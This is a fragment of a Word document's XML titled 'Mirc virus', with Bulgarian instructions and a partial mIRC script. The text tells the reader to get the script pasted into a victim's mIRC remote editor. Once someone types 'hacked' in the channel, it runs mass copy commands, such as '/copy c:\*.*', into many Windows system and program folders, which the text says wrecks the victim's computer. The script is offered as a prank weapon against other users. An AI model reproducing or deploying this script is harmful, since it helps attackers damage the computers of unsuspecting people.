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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mirc virus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Това се копира в remote в mirc,t.e натиснете alt+r в mircat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 жертвата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Virusat kopira c:\ v d:\ I dr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Abe 6te otvorite baq rabota na 4oveka,na 4iito komputer se e izpalnil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Virusa se aktivira kato napi6ete “hacked” v kanala, v koito e jertvatvata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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text:*hacked*:#:/.hacked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cked {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d:\gam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d:\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Font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AdCache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COLOR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DirectX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DirectX\Dinput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DirectX\Migrate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VIEWER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\VMM32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COMMAND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32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TEM32\DRIVER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Desktop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HELP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MEDIA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TEMP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TASK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All User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windows\SYSBCKUP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Accessori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Internet Explorer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Plus!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Plus!\Them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/copy c:\*.* c:\Program Files\Outlook Express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DirectX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DirectX\Setup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Accessories\HyperTerminal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\ClipArt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\doc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\STCD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\Symbol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Program Files\SureThing\Symbols\White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copy c:\*.* c:\My Document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}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9:00Z</dcterms:created>
  <dc:creator>*</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>*</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-03-29T12:11:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>Mirc virus</dc:title>
</cp:coreProperties>
</file>